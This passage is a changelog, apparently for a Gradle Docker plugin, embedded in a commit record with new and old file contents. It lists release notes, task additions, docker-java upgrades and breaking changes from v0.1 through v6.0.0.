add the test `started`, `passed` and `failed` logging messages so as to make it absolutely clear to users what is being run vs having no output at all. - {uri-github}\/pull\/373[Pull request 373]\n* Bump `docker-java` to v`3.0.10` - {uri-github}\/pull\/378[Pull request 378]\n\n[discrete]\n=== v3.0.6 (March 2, 2017)\n\n* Bump vof docker-java to 3.0.7 - {uri-github}\/pull\/331[Pull request 331]\n* Add support for label parameter on docker image creation - {uri-github}\/pull\/332[Pull request 332]\n\n[discrete]\n=== v3.0.5 (December 27, 2016)\n\n* Support multiple variables per singled ENV cmd - {uri-github}\/pull\/311[Pull request 311]\n* Implement a sane default docker URL based on environment - {uri-github}\/pull\/313[Pull request 313]\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] methods `onNext` and `onComplete` for all tasks - {uri-github}\/pull\/307[Pull request 307]\n\n[discrete]\n=== v3.0.4 (December 1, 2016)\n\n* Implement https:\/\/github.com\/reactive-streams\/reactive-streams-jvm\/#2-subscriber-code[reactive-stream] method `onError` for all tasks - {uri-github}\/pull\/302[Pull request 302]\n* Bump docker-java to 3.0.6 - {uri-github}\/pull\/279[Pull request 279]\n\n[discrete]\n=== v3.0.3 (September 6, 2016)\n\n* Print error messages received from docker engine when build fails - {uri-github}\/pull\/265[Pull request 265]\n* Bump docker-java to 3.0.5 - {uri-github}\/pull\/263[Pull request 263]\n* Add support for `force` removal on `DockerRemoveImage` - {uri-github}\/pull\/266[Pull request 266]\n* Various fixes and cleanups as well default to alpine image for all functional tests - {uri-github}\/pull\/269[Pull request 269]\n* Added `editorconfig` file with some basic defaults - {uri-github}\/pull\/270[Pull request 270]\n\n[discrete]\n=== v3.0.2 (August 14, 2016)\n\n* Add support for build-time variables in `DockerBuildImage` task - {uri-github}\/pull\/240[Pull request 240]\n* Fix incorrect docker-java method name in `DockerCreateContainer` task - {uri-github}\/pull\/242[Pull request 242]\n* Can define devices on `DockerCreateContainer` task - {uri-github}\/pull\/245[Pull request 245]\n* Can now supply multiple ports when working with `docker-java-application` - {uri-github}\/pull\/254[Pull request 254]\n* Bump docker-java to 3.0.2 - {uri-github}\/pull\/259[Pull request 259]\n* If buildscript repos are required make sure they are added after evaluation - {uri-github}\/pull\/260[Pull request 260]\n\n[discrete]\n=== v3.0.1 (July 6, 2016)\n\n* Simplify Gradle TestKit usage - {uri-github}\/pull\/225[Pull request 225]\n* Ensure `tlsVerify` is set in addition to `certPath` for DockerClientConfig setup - {uri-github}\/pull\/230[Pull request 230]\n* Upgrade to Gradle 2.14.\n\n[discrete]\n=== v3.0.0 (June 5, 2016)\n\n* Task `DockerLogsContainer` gained attribute `sink` - {uri-github}\/pull\/203[Pull request 203]\n* Task `DockerBuildImage` will no longer insert extra newline as part of build output - {uri-github}\/pull\/206[Pull request 206]\n* Upgrade to docker-java 3.0.0 - {uri-github}\/pull\/217[Pull request 217]\n* Fallback to buildscript.repositories for internal dependency resolution if no repositories were defined - {uri-github}\/pull\/218[Pull request 218]\n* Added task `DockerExecContainer` - {uri-github}\/pull\/221[Pull request 221]\n* Added task `DockerCopyFileToContainer` - {uri-github}\/pull\/222[Pull request 222]\n* Task `DockerCreateContainer` gained attribute `restartPolicy` - {uri-github}\/pull\/224[Pull request 224]\n* Remove use of Gradle internal methods.\n* Added ISSUES.md file.\n* Upgrade to Gradle 2.13.\n\n[discrete]\n=== v2.6.8 (April 10, 2016)\n\n* Added task `DockerLogsContainer` - {uri-github}\/pull\/181[Pull request 181]\n* Bump docker-java to v2.3.3 - {uri-github}\/pull\/183[Pull request 183]\n* Bug fix when not checking if parent dir already exists before creating with `DockerCopyFileToContainer` - {uri-github}\/pull\/186[Pull request 186]\n* `DockerWaitContainer` now produces exitCode - {uri-github}\/pull\/189[Pull request 189]\n* `apiVersion` can now be set on `DockerExtension` and overriden on all tasks - {uri-github}\/pull\/182[Pull request 182]\n* Internal fix where task variables had to be defined - {uri-github}\/pull\/194[Pull request 194]\n\n[discrete]\n=== v2.6.7 (March 10, 2016)\n\n* Upgrade to Gradle 2.11.\n* Bug fix when copying single file from container and hostPath is set to directory for `DockerCopyFileFromContainer` - {uri-github}\/pull\/163[Pull request 163]\n* Step reports are now printed to stdout by default for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* UP-TO-DATE functionality has been removed from `DockerBuildImage` as there were too many corner cases to account for - {uri-github}\/pull\/172[Pull request 172]\n\n[discrete]\n=== v2.6.6 (February 27, 2016)\n\n* Added docker step reports for `DockerBuildImage` - {uri-github}\/pull\/145[Pull request 145]\n* Added `onlyIf` check for `DockerBuildImage` - {uri-github}\/pull\/139[Pull request 139]\n* Added method logConfig for `DockerCreateContainer` - {uri-github}\/pull\/157[Pull request 157]\n* Various commands can now be passed closures for `Dockerfile` - {uri-github}\/pull\/155[Pull request 155]\n* Fix implementation of exposedPorts for `DockerCreateContainer` - {uri-github}\/pull\/140[Pull request 140]\n* Upgrade to Docker Java 2.2.2 - {uri-github}\/pull\/158[Pull request 158].\n\n[discrete]\n=== v2.6.5 (January 16, 2016)\n\n* Fix implementation of `DockerCopyFileFromContainer` - {uri-github}\/pull\/135[Pull request 135].\n* Add `networkMode` property to `DockerCreateContainer` - {uri-github}\/pull\/114[Pull request 114].\n* Upgrade to Docker Java 2.1.4 - {uri-github}\/issues\/138[Issue 138].\n\n[discrete]\n=== v2.6.4 (December 24, 2015)\n\n* Expose privileged property on `DockerCreateContainer` - {uri-github}\/pull\/130[Pull request 130].\n\n[discrete]\n=== v2.6.3 (December 23, 2015)\n\n* Expose force and removeVolumes properties on `DockerRemoveContainer` - {uri-github}\/pull\/129[Pull request 129].\n\n[discrete]\n=== v2.6.2 (December 22, 2015)\n\n* Expose support for LogDriver on `DockerCreateContainer` - {uri-github}\/pull\/118[Pull request 118].\n* Upgrade to Docker Java 2.1.2.\n\n[discrete]\n=== v2.6.1 (September 21, 2015)\n\n* Correct the `withVolumesFrom` call on `DockerCreateContainer` task which needs to get a `VolumesFrom[]` array as the parameter - {uri-github}\/pull\/102[Pull request 102].\n* Upgrade to Docker Java 2.1.1 - {uri-github}\/pull\/109[Pull request 109].\n\n[discrete]\n=== v2.6 (August 30, 2015)\n\n* Upgrade to Docker Java 2.1.0 - {uri-github}\/pull\/92[Pull request 92].\n_Note:_ The Docker Java API changed vastly with v2.0.0. The tasks `DockerBuildImage`, `DockerPullImage` and\n`DockerPushImage` do not provide a response handler anymore. This is a breaking change. Future versions of the plugin\nmight open up the response handling again in some way.\n* `DockerListImages` with `filter` call a wrong function from `ListImagesCmdImpl.java` - {uri-github}\/issues\/105[Issue 105].\n\n[discrete]\n=== v2.5.2 (August 15, 2015)\n\n* Fix listImages task throwing GroovyCastException - {uri-github}\/issues\/96[Issue 96].\n* Add support for publishAll in DockerCreateContainer - {uri-github}\/pull\/94[Pull request 94].\n* Add optional dockerFile option to the DockerBuildImage task - {uri-github}\/pull\/47[Pull request 47].\n\n[discrete]\n=== v2.5.1 (July 29, 2015)\n\n* Adds Dockerfile support for the LABEL instruction - {uri-github}\/pull\/86[Pull request 86].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.4.0. Underlying API does not provide\nsetting port bindings for task `DockerStartContainer` anymore. Needs to be set on `DockerCreateContainer`.\n\n[discrete]\n=== v2.5 (July 18, 2015)\n\n* Expose response handler for `DockerListImages` task - v[Issue 75].\n* Pass in credentials when building an image - {uri-github}\/issues\/76[Issue 76].\n\n[discrete]\n=== v2.4.1 (July 4, 2015)\n\n* Add `extraHosts` property to task `DockerCreateContainer` - {uri-github}\/pull\/79[Pull request 79].\n* Add `pull` property to task `DockerBuildImage` - {uri-github}\/pull\/78[Pull request 78].\n\n[discrete]\n=== v2.4 (May 16, 2015)\n\n* Added missing support for properties `portBindings` and `cpuset` in `CreateContainer` - {uri-github}\/pull\/66[Pull request 66].\n* Expose response handlers so users can inject custom handling logic - {uri-github}\/issues\/65[Issue 65].\n* Upgrade to Gradle 2.4 including all compatible plugins and libraries.\n\n[discrete]\n=== v2.3.1 (April 25, 2015)\n\n* Added support for `Binds` when creating containers - {uri-github}\/pull\/54[Pull request 54].\n* Added task for copying files from a container to a host - {uri-github}\/pull\/57[Pull request 57].\n\n[discrete]\n=== v2.3 (April 18, 2015)\n\n* Added task `DockerInspectContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Added property `containerName` to task `DockerCreateContainer` - {uri-github}\/pull\/44[Pull request 44].\n* Allow for linking containers for task `DockerCreateContainer` - {uri-github}\/pull\/53[Pull request 53].\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.2.0.\n\n[discrete]\n=== v2.2 (April 12, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v1.1.0.\n\n[discrete]\n=== v2.1 (March 24, 2015)\n\n* Renamed property `registry` to `registryCredentials` for plugin extension and tasks implementing `RegistryCredentialsAware` to better indicate its purpose.\n_Note:_ This is a breaking change.\n\n[discrete]\n=== v2.0.3 (March 20, 2015)\n\n* Allow for specifying port bindings for container start command. - {uri-github}\/issues\/30[Issue 30].\n* Throw an exception if an error response is encountered - {uri-github}\/issues\/37[Issue 37].\n* Upgrade to Gradle 2.3.\n\n[discrete]\n=== v2.0.2 (February 19, 2015)\n\n* Set source and target compatibility to Java 6 - {uri-github}\/issues\/32[Issue 32].\n\n[discrete]\n=== v2.0.1 (February 10, 2015)\n\n* Extension configuration method for `DockerJavaApplicationPlugin` needs to be registered via extension instance - {uri-github}\/issues\/28[Issue 28].\n\n[discrete]\n=== v2.0 (February 4, 2015)\n\n* Upgrade to Gradle 2.2.1 including all compatible plugins and libraries.\n\n[discrete]\n=== v0.8.3 (February 4, 2015)\n\n* Add project group to default tag built by Docker Java application plugin - {uri-github}\/issues\/25[Issue 25].\n\n[discrete]\n=== v0.8.2 (January 30, 2015)\n\n* Expose method for task `Dockerfile` for providing vanilla Docker instructions.\n\n[discrete]\n=== v0.8.1 (January 24, 2015)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.5.\n* Correctly create model instances for create container task - {uri-github}\/issues\/19[Issue 19].\n\n[discrete]\n=== v0.8 (January 7, 2014)\n\n* Allow for pushing to Docker Hub - {uri-github}\/issues\/18[Issue 18].\n* Better handling of API responses.\n* Note: Change to plugin extension. The property `docker.serverUrl` is now called `docker.url`. Instead of `docker.credentials`, you will need to use `docker.registry`.\n\n[discrete]\n=== v0.7.2 (December 23, 2014)\n\n* `Dockerfile` task is always marked UP-TO-DATE after first execution - {uri-github}\/issues\/13[Issue 13].\n* Improvements to `Dockerfile` task - {uri-github}\/pull\/16[Pull request 16].\n * Fixed wrong assignment of key field in environment variable instruction.\n * Allow for providing multiple ports to the expose instruction.\n\n[discrete]\n=== v0.7.1 (December 16, 2014)\n\n* Fixed entry point definition of Dockerfile set by Java application plugin.\n\n[discrete]\n=== v0.7 (December 14, 2014)\n\n* Allow for properly add user-based instructions to Dockfile task with predefined instructions without messing up the order. - {uri-github}\/issues\/12[Issue 12].\n* Renamed task `dockerCopyDistTar` to `dockerCopyDistResources` to better express intent.\n\n[discrete]\n=== v0.6.1 (December 11, 2014)\n\n* Allow for setting path to certificates for communicating with Docker over SSL - {uri-github}\/issues\/10[Issue 10].\n\n[discrete]\n=== v0.6 (December 7, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.4.\n* Added Docker Java application plugin.\n* Better documentation.\n\n[discrete]\n=== v0.5 (December 6, 2014)\n\n* Fixed implementations of tasks `DockerPushImage` and `DockerCommitImage` - {uri-github}\/issues\/11[Issue 11].\n\n[discrete]\n=== v0.4 (November 27, 2014)\n\n* Added task for creating a Dockerfile.\n\n[discrete]\n=== v0.3 (November 23, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.10.3.\n* Changed package name to `com.bmuschko.gradle.docker`.\n* Changed group ID to `com.bmuschko`.\n* Adapted plugin IDs to be compatible with Gradle's plugin portal.\n\n[discrete]\n=== v0.2 (June 19, 2014)\n\n* Usage of https:\/\/github.com\/docker-java\/docker-java[docker-java library] v0.8.2.\n* Provide custom task type for push operation.\n* Support for using remote URLs when building image - {uri-github}\/issues\/3[Issue 3].\n\n[discrete]\n=== v0.1 (May 11, 2014)\n\n* Initial release.\n","old_contents":"== Change Log\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and `DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`,`DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issue\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issue\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is not inject into the method `runRemoteCommand` anymore - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of 